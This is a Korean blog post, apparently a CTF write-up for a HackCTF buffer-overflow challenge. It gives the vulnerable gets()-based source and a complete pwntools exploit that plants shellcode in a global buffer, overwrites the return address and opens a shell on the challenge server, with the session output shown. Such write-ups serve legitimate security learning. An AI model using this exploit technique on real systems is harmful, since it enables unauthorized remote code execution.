Phantom

HackCTF 내 버퍼가 흘러넘친다!!! 본문

Pwnable/HackCTF

HackCTF 내 버퍼가 흘러넘친다!!!

Ph4nt0m_ 2022. 9. 1. 17:00
반응형

내 버퍼가 흘러넘친다!!!

Source

char name[50];
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[20]; // [esp+0h] [ebp-14h]

  setvbuf(stdout, 0, 2, 0);
  printf("Name : ");
  read(0, &name, 50u);
  printf("input : ");
  gets(s);
  return 0;
}

Solve

from pwn import *

#context.log_level = 'DEBUG'

e = ELF("./prob1")
#p = process("./prob1")
r = remote("ctf.j0n9hyun.xyz", 3003)

shellcode = shellcraft.i386.linux.sh()
name = 0x804a060

payload1 = ''
payload1 += asm(shellcode)
r.recvuntil("Name : ")
r.sendline(payload1)

r.recvuntil("input : ")
payload2 = ''
payload2 += "A"*24
payload2 += p32(name)
r.sendline(payload2)

r.interactive()
➜  hackctf python prob1.py
[*] '/home/ubuntu/ctf/hackctf/prob1'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
[+] Opening connection to ctf.j0n9hyun.xyz on port 3003: Done
[*] Switching to interactive mode
$ id
uid=1000(attack) gid=1000(attack) groups=1000(attack)

Uploaded by Notion2Tistory v1.1.0

반응형

'Pwnable > HackCTF' 카테고리의 다른 글

HackCTF x64 Buffer Overflow  (0) 2022.09.01
HackCTF Simple_overflow_ver_2  (0) 2022.09.01
HackCTF x64 Simple_size_BOF  (0) 2022.09.01
HackCTF Basic BOF #2  (0) 2022.09.01
HackCTF Basic BOF #1  (0) 2022.09.01
'Pwnable/HackCTF' Related Articles more
Comments